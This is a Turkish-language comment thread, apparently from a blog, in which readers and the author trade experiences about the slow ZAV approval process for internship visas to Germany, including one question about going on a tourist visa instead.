  1. ben de aynı şekilde mail yağmuruna tutmuştum. Çok fark edeceğini sanmıyorum, belki yüzde 5-10 falan hızlandırır süreci. Zaten en uzun ve yavaş kısım ZAV, sonrası çorap söküğü misali.

 27. Bir şey daha soracağım şimdi benim okulum stajimi onayladi. Almanyada ki staj yeri tanidik olduğu için bana ne ödenicek bir ücret nede sigorta yapilacak ben zav almasam direk turistik vize ile gitsem zaten orda calismayacagim olur mu acaba?

  1. Ya net bir şey söyleyemem sonuçta tanıdık şirketle aranızda halletmeniz gereken bir mesele, ama genelde Alman şirketler çok yanaşmaz çalışma izinsiz çalıştırmaya. Çalışmayacağım derken kastınız gözlem amaçlı bulunmak mı?

 28. Merhaba, geçen hafta pazartesi attım maille 2 belgeyi bu pazartesi staj yapacağım yer ağustos ortasına kadar geri dönüş beklemiyoruz diye mail attı. aman tanrım… 2.5 ay sonrası… umarım bir yanlışlık vardır.
  Siz tam olarak nerelere mail atmıştınız yalvarmak için? Ben adında ZAV geçen her yere attım ama öyle bir şansımiz yok falan diyorlar.
  Naparsanız yapın en az 3 ay önceden falan halledin su ZAVı böyle ugrasır durursunuz sonra bi yere gidemeden kalırsınız öyle.

  1. Geçmiş olsun :/ ya zav kısmında yalvarabileceğiniz çok bir şey yok. Ben sadece bir kez konsolosluğa zav olmadan gitmemin imkanı var mı diye sormak için mail atmıştım.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Solve : *
32 ⁄ 16 =


*